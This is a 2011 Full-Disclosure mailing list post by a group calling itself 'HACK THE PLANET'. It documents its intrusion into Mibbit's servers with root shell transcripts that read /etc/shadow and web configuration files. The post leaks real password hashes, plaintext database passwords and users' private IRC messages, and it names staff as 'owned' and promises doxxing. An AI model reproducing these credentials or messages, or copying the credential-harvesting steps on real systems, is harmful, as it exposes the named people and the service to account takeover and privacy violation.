lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201108140116.p7E1G8Al023739@post.webmailer.de>
Date: Sun, 14 Aug 2011 01:16:08 GMT
From: h@...the.planet
To: full-disclosure@...ts.grok.org.uk
Subject: HACK THE PLANET | Mibbit

From: http://pastebin.com/z8iMAEeX


HACK THE PLANET


:: Table of Contents ::
 0x01 ~ Preface
 0x02 ~ tools.mibbit.com
  - 0x03 ~ PM logs
 0x04 ~ status.mibbit.com
 0x05 ~ sidewinder.netonecom.net
 0x06 ~ d0x
 0x07 ~ exit


:: 0x01 - Preface :: 

You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.

Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.

More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from Lulzsec releases.

Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit fueling Lulzsec/#antisec efforts. Enjoy.

- HTP


targ3t:

-                           Mibbit

0wn3d:

 -               Axod       Azander    Havvy
 -               Hercule    Joshua     Kitsune
 -               Molkmin    Pottsi     Sindacious


:: 0x02 - 0wnage - tools.mibbit.com ::
[h@ck ~]$ ssh root@...ls.mibbit.com
root@...ls.mibbit.com's password: 
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root@...ls:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root@...ls:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root@...ls:~# ps aux | grep log
root       201  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/0]
root       202  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/1]
root       203  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/2]
root       204  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/3]
syslog    9019  0.0  0.2  21200  1288 ?        Sl   Mar15   1:35 rsyslogd -c4
wwwadmin 18565  0.0  0.6   5056  3360 ?        S    Mar31  22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root@...ls:~# ls -al /
total 96
drwxr-xr-x  22 root root  4096 Mar 15 22:22 .
drwxr-xr-x  22 root root  4096 Mar 15 22:22 ..
drwxrwxrwx  20 root root  4096 Aug  6 23:14 OLD_DATA
drwxr-xr-x   2 root root  4096 Mar 15 12:19 bin
drwxr-xr-x   2 root root  4096 Apr 29  2010 boot
drwxr-xr-x  11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x  76 root root  4096 Aug 13 01:26 etc
drwxr-xr-x   3 root root  4096 Mar 15 12:31 home
drwxr-xr-x  17 root root 12288 Aug  9 00:38 lib
drwx------   2 root root 16384 Apr 29  2010 lost+found
drwxr-xr-x   2 root root  4096 Apr 29  2010 media
drwxr-xr-x   2 root root  4096 Apr 23  2010 mnt
drwxr-xr-x   2 root root  4096 Apr 29  2010 opt
dr-xr-xr-x 117 root root     0 Mar 15 12:04 proc
drwx------   4 root root  4096 Aug 13 02:32 root
drwxr-xr-x   2 root root  4096 Mar 15 12:20 sbin
drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
drwxr-xr-x   2 root root  4096 Apr 29  2010 srv
drwxr-xr-x  12 root root     0 Mar 15 12:04 sys
drwxrwxrwt   4 root root  4096 Aug 12 08:40 tmp
drwxr-xr-x  11 root root  4096 Aug  9 00:44 usr
drwxr-xr-x  15 root root  4096 Aug  9 00:44 var
root@...ls:~# ls -al /home
total 12
drwxr-xr-x  3 root     root     4096 Mar 15 12:31 .
drwxr-xr-x 22 root     root     4096 Mar 15 22:22 ..
drwxr-xr-x  7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root@...ls:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x  7 wwwadmin wwwadmin   4096 Aug 12 16:13 .
drwxr-xr-x  3 root     root       4096 Mar 15 12:31 ..
-rw-r--r--  1 wwwadmin wwwadmin   5014 Aug  7 20:51 .bash_history
-rw-r--r--  1 wwwadmin wwwadmin    220 Apr 19  2010 .bash_logout
-rw-r--r--  1 wwwadmin wwwadmin   3136 Aug  7 17:39 .bashrc
drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:10 .cache
-rw-r--r--  1 wwwadmin wwwadmin     19 Jan 29  2009 .hercpw
-rw-r--r--  1 wwwadmin wwwadmin    148 Apr 11  2010 .htpasswd
-rw-------  1 wwwadmin wwwadmin    177 Aug  6 15:34 .lesshst
-rw-------  1 wwwadmin wwwadmin    214 Mar 16 20:20 .mysql_history
-rw-------  1 wwwadmin wwwadmin     55 Mar 16 18:19 .php_history
-rw-r--r--  1 wwwadmin wwwadmin    700 Mar 15 20:55 .profile
-rw-r--r--  1 wwwadmin wwwadmin     66 Mar 31 16:37 .selected_editor
drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:53 .ssh
drwxr-xr-x  2 wwwadmin wwwadmin   4096 Mar 15 21:20 .vim
-rw-------  1 wwwadmin wwwadmin  13346 Aug 12 16:13 .viminfo
-rw-r--r--  1 wwwadmin wwwadmin   4425 Mar 15 20:53 .vimrc
-rw-r--r--  1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x  6 wwwadmin wwwadmin   4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin   4096 Aug 13 02:00 loggerbot
-rw-r--r--  1 wwwadmin wwwadmin     45 Apr  5 20:40 test.php
root@...ls:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root  4096 Aug  6 23:14 .
drwxr-xr-x 22 root root  4096 Mar 15 22:22 ..
drwxr-xr-x  2 root root  4096 Mar 15 10:46 bin
drwxr-xr-x  2 root root  4096 Oct 20  2008 boot
drwxr-xr-x  4 root root  8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root  4096 Mar 15 10:46 etc
drwxr-xr-x  5 root root  4096 Jan 12  2009 home
drwxr-xr-x 12 root root  8192 Mar 15 10:46 lib
drwx------  2 root root 16384 Nov 25  2008 lost+found
drwxr-xr-x  2 root root  4096 Nov 25  2008 media
drwxr-xr-x  2 root root  4096 Oct 20  2008 mnt
drwxr-xr-x  2 root root  4096 Nov 25  2008 opt
drwxr-xr-x  2 root root  4096 Oct 20  2008 proc
drwxr-xr-x  3 root root  4096 Mar  7 22:29 root
drwxr-xr-x  2 root root  4096 Mar 15 10:46 sbin
-rw-------  1 root root 31903 Jan 12  2009 sql0swW3A
drwxr-xr-x  2 root root  4096 Nov 25  2008 srv
drwxr-xr-x  2 root root  4096 Oct 14  2008 sys
drwxrwxrwt  4 root root  4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root  4096 Dec  9  2008 usr
drwxr-xr-x 15 root root  4096 Dec 17  2008 var
root@...ls:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x  5 root     root     4096 Jan 12  2009 .
drwxrwxrwx 20 root     root     4096 Aug  6 23:14 ..
drwxr-xr-x 13     1001     1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x  4 wwwadmin wwwadmin 4096 Oct 12  2009 mibbit
drwxr-xr-x  8     1002     1002 4096 Mar 15 09:29 wwwadmin
root@...ls:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001      4096 Mar 15 10:46 .
drwxr-xr-x  5 root root      4096 Jan 12  2009 ..
-rw-------  1 1001 1001     14707 Mar 14 23:29 .bash_history
-rw-r--r--  1 1001 1001       220 May 12  2008 .bash_logout
-rw-r--r--  1 1001 1001      3115 May 12  2008 .bashrc
-rw-------  1 1001 1001        41 Jun  1  2010 .lesshst
-rw-------  1 1001 1001       256 Mar 12 14:44 .nano_history
-rw-r--r--  1 1001 1001       675 May 12  2008 .profile
drwxr-xr-x  2 1001 1001      4096 Mar  7 23:44 .ssh
-rw-------  1 1001 1001       821 May 21  2009 .viminfo
drwxr-xr-x 13 1001 1001      4096 Jan  5  2010 Unreal3.2.7
drwx------ 13 1001 1001      4096 Apr 13  2009 Unreal3.2.8
drwx------ 13 1001 1001      4096 Dec 22  2010 Unreal3.2.8.1
-rw-r--r--  1 1001 1001   8181760 Sep  9  2009 Unreal3.2.8.1.tar
-rw-r--r--  1 1001 1001   8181760 Apr  7  2009 Unreal3.2.8.tar
drwxr-xr-x  7 1001 1001      4096 Feb  3  2009 anope-1.8.0-rc1
drwxr-xr-x  8 1001 1001      4096 Jan  7  2009 bopm
drwxr-xr-x  5 1001 1001      4096 Jan  7  2009 bopm-3.1.3
-rw-------  1 1001 1001      1475 Jul 30  2009 dead.letter
drwxr-xr-x  2 1001 1001      8192 Mar 12 14:44 dronebl
drwxr-xr-x  3 1001 1001      4096 May  4  2009 hub
drwxr-xr-x  9 1001 1001      4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r--  1 1001 1001        81 Jan 26  2010 irc.us.mibbit.net.txt
-rw-r--r--  1 1001 1001 132744770 Feb 28  2010 ircd.tgz
-rw-r--r--  1 1001 1001       623 Oct 27  2009 jim
-rw-------  1 1001 1001    949701 Feb  8  2010 mbox
drwxr-xr-x  7 1001 1001      4096 Jan 26  2010 services

:: 0x03 - PM logs - tools.mibbit.com ::

root@...ls:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
 
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
>>> karma motherfuck3r
 
molkmin -> alpha: not that I can see 
molkmin -> alpha: I wasn't watching 
molkmin -> alpha: it hardly matters :) 
alpha -> molkmin: just silenced them 
alpha -> molkmin: :) 
molkmin -> alpha: everyone in #chat is assholes :) 
alpha -> molkmin: lol 
alpha -> molkmin: thanks 
>>> thX

jared -> molkmin: i've seen some scary botnets on dalnet 
jared -> molkmin: they could knock you off the server in less than a second 
molkmin -> jared: I've never had that happen yet 
molkmin -> jared: I have a mac 
>>> ??

jared -> molkmin: VNCing into a linux box 
jared -> molkmin: with a windows virtualbox guest 
jared -> molkmin: to use the VPN 
jared -> molkmin: to connect to a terminal server at work 
jared -> molkmin: friggin ridiculous 
molkmin -> jared: get a freaking mac 
jared -> molkmin: how would that help? 
>>> ...

[h@ck ~]$ wc mibbitpms.out 
  51610  493903 2955301 mibbitpms.out
[h@ck ~]$ wc mibbitchanmsgs.out 
  622607  4558597 32539145 mibbitchanmsgs.out
>>> f1les @ 0x07 <<<

:: 0x04 - status.mibbit.com ::
[h@ck ~]$ ssh wwwadmin@...tus.mibbit.com
wwwadmin@...tus.mibbit.com's password: 
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin@...tus:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin@...tus:~$ ls -alt /
total 92
drwxrwxrwt  4 root root  4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root  4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root  4096 Jul  7 07:40 .
drwxr-xr-x 21 root root  4096 Jul  7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul  7 07:40 dev
drwxr-xr-x 11 root root     0 Jul  7 07:40 sys
dr-xr-xr-x 99 root root     0 Jul  7 07:40 proc
drwxr-xr-x  2 root root  4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------  3 root root  4096 May 29 23:11 root
drwxr-xr-x  2 root root  4096 Nov  6  2010 sbin
drwxr-xr-x  6 root root  4096 Mar  4  2010 home
drwxr-xr-x 11 root root  4096 Sep 30  2009 usr
drwxr-xr-x 14 root root  4096 Aug 11  2009 var
drwxr-xr-x  2 root root  4096 Apr 23  2009 media
drwxr-xr-x  2 root root  4096 Apr 23  2009 opt
drwxr-xr-x  2 root root  4096 Apr 23  2009 srv
drwx------  2 root root 16384 Apr 23  2009 lost+found
drwxr-xr-x  2 root root  4096 Apr 13  2009 boot
drwxr-xr-x  2 root root  4096 Apr 13  2009 mnt
drwxr-xr-x  2 root root  4096 Mar  6  2009 selinux
wwwadmin@...tus:~$ ls -alt /home
total 24
drwxr-xr-x  6 wwwadmin  wwwadmin  4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root      root      4096 Jul  7 07:40 ..
drwxr-xr-x  7 mibbit    mibbit    4096 Jun 29 13:30 mibbit
drwxr-xr-x  4 zfreebies zfreebies 4096 Apr 29  2010 zfreebies
drwxr-xr-x  3 jimmy     jimmy     4096 Mar  8  2010 jimmy
drwxr-xr-x  6 root      root      4096 Mar  4  2010 .
wwwadmin@...tus:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin  120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug  7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug  7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26  2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25  2011 wiki_backup_25Jan
lrwxrwxrwx 1 root     root       31 Jan 17  2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10  2010 WP_BACKUP
drwxr-xr-x 6 root     root     4096 Mar  4  2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin   32 Sep 13  2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin  220 Mar  2  2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar  2  2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin  675 Mar  2  2009 .profile
wwwadmin@...tus:~$ ls -alt /var/www/
total 56
drwxr-xr-x  4 root     root     4096 May 12  2010 www.stopitmovies.com
drwxr-xr-x 13 root     root     4096 May 12  2010 .
drwxr-xr-x  4 root     root     4096 Mar 24  2010 status.mibbit.com
drwxr-xr-x  4 root     root     4096 Mar 16  2010 a.mibbit.com
drwxr-xr-x  6 root     root     4096 Feb 19  2010 blog.mibbit.com
drwxr-xr-x  4 root     root     4096 Dec 23  2009 adminwiki.mibbit.com
drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.rollered.com
drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.wizzig.com
drwxr-xr-x  4 www-data www-data 4096 Oct 12  2009 www.axod.net
drwxr-xr-x  5 root     root     4096 Sep 30  2009 www.zfreebies.com
drwxr-xr-x  5 root     root     4096 Sep 15  2009 forum.zfreebies.co.uk
drwxrwxr-x  5 www-data www-data 4096 Sep 13  2009 wiki.mibbit.com
-rw-r--r--  1 root     root       45 Aug 11  2009 index.html
drwxr-xr-x 14 root     root     4096 Aug 11  2009 ..
wwwadmin@...tus:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
	$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
	@mysql_select_db("adverts", $sql);
wwwadmin@...tus:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?

    $sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin@...tus:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin  4096 Nov 15  2010 .
-rw-r--r-- 1 wwwadmin www-data   655 Nov 15  2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data  4096 Feb 23  2010 wp-content
-rw-r--r-- 1 wwwadmin www-data  1548 Feb 19  2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19  2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19  2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data  3693 Feb 19  2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data  7578 Feb 19  2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data   487 Feb 19  2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data   316 Feb 19  2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data  2341 Feb 19  2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19  2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data  4096 Feb 19  2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data  1946 Feb 19  2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data  1253 Feb 19  2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data   238 Feb 19  2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data  2616 Feb 19  2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19  2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data   274 Feb 19  2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data  3928 Feb 19  2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data  4096 Feb 19  2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19  2010 license.txt
-rw-r--r-- 1 wwwadmin www-data  7644 Feb 19  2010 readme.html
-rw-r--r-- 1 wwwadmin www-data   397 Feb 19  2010 index.php
drwxr-xr-x 6 root     root      4096 Feb 19  2010 ..
wwwadmin@...tus:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog');    // The name of the database
define('DB_USER', 'wpuser');     // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin@...tus:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r--  1 www-data www-data   6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x  9 www-data www-data   4096 Mar 21 12:41 extensions
drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan 26  2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 .
drwxrwxr-x 22 www-data www-data   4096 Jan 26  2011 images
drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 bin
drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 config
drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 docs
drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 includes
drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 languages
drwxrwxr-x 13 www-data www-data  12288 Jan 26  2011 maintenance
drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 math
drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 serialized
drwxrwxr-x 10 www-data www-data   4096 Jan 26  2011 skins
drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan  4  2011 cache
-rw-r--r--  1 wwwadmin wwwadmin  59433 Jan  4  2011 RELEASE-NOTES
-rw-r--r--  1 wwwadmin wwwadmin   2090 Jan  4  2011 CREDITS
-rw-r--r--  1 wwwadmin wwwadmin   8821 Jan  4  2011 profileinfo.php
-rw-rw-r--  1 root     root        655 Nov 15  2010 favicon.ico
-rw-r--r--  1 wwwadmin wwwadmin  13307 Mar 25  2010 UPGRADE
-rw-r--r--  1 wwwadmin wwwadmin 392287 Mar 12  2010 HISTORY
-rw-r--r--  1 wwwadmin wwwadmin   4905 Mar  8  2010 thumb.php
-rw-r--r--  1 wwwadmin wwwadmin   4707 Feb 15  2010 api.php
-rw-r--r--  1 wwwadmin wwwadmin    174 Feb  3  2010 php5.php5
-rw-r--r--  1 wwwadmin wwwadmin     89 Feb  3  2010 redirect.phtml
-rw-r--r--  1 wwwadmin wwwadmin     86 Feb  3  2010 wiki.phtml
-rw-r--r--  1 wwwadmin wwwadmin   4329 Jan  1  2010 index.php
-rw-r--r--  1 wwwadmin wwwadmin   4031 Oct 14  2009 img_auth.php
-rw-rw-r--  1 www-data www-data   9416 Sep 13  2009 mibbit.png
-rw-rw-r--  1 www-data www-data   1049 Sep 13  2009 AdminSettings.php
drwxrwxr-x  5 www-data www-data   4096 Sep 13  2009 ..
-rw-r--r--  1 wwwadmin wwwadmin     76 Jul 27  2009 FAQ
drwxrwxr-x  4 www-data www-data   4096 Jul 13  2009 t
drwxrwxr-x  2 www-data www-data   4096 Jul 13  2009 tests
-rw-r--r--  1 wwwadmin wwwadmin    648 May  7  2009 StartProfiler.sample
-rw-rw-r--  1 www-data www-data   3952 Mar 21  2009 install-utils.inc
-rw-r--r--  1 wwwadmin wwwadmin   3054 Mar 21  2009 opensearch_desc.php
-rw-r--r--  1 wwwadmin wwwadmin    383 Mar 21  2009 redirect.php
-rw-r--r--  1 wwwadmin wwwadmin     32 Mar 16  2009 trackback.php5
-rw-rw-r--  1 www-data www-data    603 Jan  7  2009 StartProfiler.php
-rw-r--r--  1 wwwadmin wwwadmin   3649 Nov 11  2008 README
-rw-r--r--  1 wwwadmin wwwadmin   1347 Nov  5  2008 trackback.php
-rw-r--r--  1 wwwadmin wwwadmin   4138 Apr 18  2008 INSTALL
-rw-rw-r--  1 www-data www-data    618 Apr 11  2008 Makefile
-rw-r--r--  1 wwwadmin wwwadmin     39 Mar  3  2008 opensearch_desc.php5
-rw-r--r--  1 wwwadmin wwwadmin     25 Feb  4  2008 api.php5
-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 img_auth.php5
-rw-r--r--  1 wwwadmin wwwadmin     28 Feb  4  2008 index.php5
-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 redirect.php5
-rw-r--r--  1 wwwadmin wwwadmin     29 Feb  4  2008 thumb.php5
-rw-r--r--  1 wwwadmin wwwadmin  17997 Apr  5  2006 COPYING
wwwadmin@...tus:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5

$wgDBtype           = "mysql";
$wgDBserver         = "localhost";
$wgDBname           = "wikidb";
$wgDBuser           = "wikiuser";
$wgDBpassword       = "a69e74574db6";
$wgDBport           = "5432";
$wgDBprefix         = "";
$wgDBadminuser      = "wikiuser";
$wgDBadminpassword  = "a69e74574db6";

# Schemas for Postgres
$wgDBmwschema       = "mediawiki";
$wgDBts2schema      = "public";
wwwadmin@...tus:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype           = "mysql";
$wgDBserver         = "localhost";
$wgDBname           = "wikiadmindb";
$wgDBuser           = "wikiadminuser";
$wgDBpassword       = "fe102b0d7793";

# MySQL specific settings
$wgDBprefix         = "";

# MySQL table options to use during installation or update
wwwadmin@...tus:~$ exit
Connection to status.mibbit.com closed.


:: 0x05 - sidewinder.netonecom.net ::
backup@...ewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root     432 2011-08-12 18:52 .
drwxr-xr-x 26 root   root     632 2011-05-12 14:12 ..
drwxr-xr-x  2 backup users   1344 2009-08-27 10:44 amram
drwxr-xr-x  2 root   root  587920 2011-08-13 12:37 awstats
-rw-------  1 backup  1452     17 2006-09-18 14:47 .bash_history
drwxr-xr-x  2 backup users    224 2009-10-07 12:58 hornet
drwxr-xr-x  2 backup users   1336 2010-08-24 11:23 ice
drwxr-xr-x  2 backup users   1216 2010-11-12 16:07 janco
drwxr-xr-x  3 backup users    264 2011-08-13 01:27 magic
drwxr-xr-x  3 backup users   1416 2011-07-26 12:32 merlin
drwxr-xr-x  2 backup users   1432 2011-05-16 05:55 multimag
drwxr-xr-x  2 backup users   1640 2010-10-11 15:49 phantom
